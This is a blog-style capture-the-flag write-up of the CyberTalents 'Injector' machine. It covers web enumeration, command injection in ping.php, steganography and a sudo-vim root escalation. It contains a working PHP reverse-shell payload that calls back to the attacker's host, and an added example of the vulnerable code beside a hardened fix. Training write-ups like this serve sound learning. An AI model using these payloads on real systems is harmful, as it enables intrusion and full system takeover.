omakmoh@home:~$

Cybertalents Injector Machine

Hello, I’m Omar! I hope y’all are safe and still following me after my last writeup xD Today I’ll share with you my writeup for the Injector machine from CyberTalents.

First of all, you should connect to the CyberTalents VPN. You will see the instructions in the file given.

I’ll start with the enumeration.

Hmm, we find port 22 open for SSH, and port 80 for HTTP (web server) running Apache/2.4.29.

Let’s discover the web server…

Sorry for my weak machine :”

We’ll see the default Apache page; it’s automatically generated when you install Apache.

Nothing got my attention, so let’s discover the hidden directories and files using dirsearch.

Using dirsearch -u http://172.24.170.117/ -e * we get this result:

The secret directory is interesting.

Let’s open the directory in the browser.

Nothing interesting; let’s discover what’s in it using the same command line.

When I found admin.html I stopped the tool, went to admin.html and said “finally”, then the page loaded :)

I ran the tool again and let it complete the scan :D

I went through all the directories and found that /tools didn’t troll me; in /tools I found “ping.php”.

Before I went in I knew it would be a command injection vulnerability. Okay, open the PHP page and we will see an input; if we put 127.0.0.1 and click lookup, the server will ping the IP.

It’s so simple, let’s get a quick reverse shell. I’ll use PHP for the reverse shell, and my command is:

127.0.0.1; php -r '$sock=fsockopen("172.24.143.xx",1337);exec("/bin/sh -i <&3 >&3 2>&3");'

Before you execute the command, we should start a netcat listener first, and then click lookup in the web page.

Okay, we now have a reverse shell.
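The flaw described above and one way to close it, as an added example that is not from the original writeup or the machine. The source of ping.php is not shown, so the function names and the `ping -c 1` command line are assumptions.

```php
<?php
// Added example. The real ping.php is not shown in the writeup, so the
// function names and the "ping -c 1" command line are assumptions.

// Vulnerable pattern: the form value is pasted into a shell command line,
// so everything after ";" runs as a second command under www-data.
function build_cmd_vulnerable(string $ip): string
{
    return "ping -c 1 " . $ip;
}

// Hardened pattern: accept only a literal IPv4/IPv6 address, then quote it
// anyway so the shell always sees exactly one argument.
function build_cmd_hardened(string $ip): ?string
{
    if (filter_var($ip, FILTER_VALIDATE_IP) === false) {
        return null; // hostnames, separators and options are all rejected
    }
    return "ping -c 1 " . escapeshellarg($ip);
}

// What the request handler would do with the form field.
function lookup(string $ip): string
{
    $cmd = build_cmd_hardened($ip);
    if ($cmd === null) {
        http_response_code(400);
        return "Invalid IP address";
    }
    return (string) shell_exec($cmd);
}

// Constructed inputs: a normal lookup and an injection-shaped value.
// Only the command strings are printed here; nothing is executed.
foreach (["127.0.0.1", "127.0.0.1; id"] as $input) {
    echo "input:      ", $input, "\n";
    echo "vulnerable: ", build_cmd_vulnerable($input), "\n";
    echo "hardened:   ", build_cmd_hardened($input) ?? "(rejected)", "\n\n";
}
```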

First, let’s spawn a terminal (I don’t know why, but I do it) using python3 -c 'import pty;pty.spawn("/bin/bash")';

Now we’re www-data and we should get a user. After 2 days of trying and searching, I went back to the photo I found in /var/www, a JPG called TrollFace.jpg.

Let’s copy it to our machine using this netcat method:

Transferred.

I tried to use strings on the image but it was useless. I tried steghide extract -sf TrollFace.jpg without a passphrase and it worked! Let’s cat the file.

We got a password; let’s see our users. Just cat /etc/passwd and we will see the user alex.

Let’s switch user to alex using ‘su’ with the password we got from TrollFace.jpg.

Best Part,

Let’s do some privilege escalation. First I ran sudo -l to show the commands that run with root permissions.

Vim runs with root permissions. Here we go: after asking my friend ‘Hameed’, he gave me this command and it works well. Thank you!

sudo vim -c ' : ! /bin/sh ' /usr/bin/vim

We got a root shell!

Thank you for reading. Any questions? Contact me on Facebook!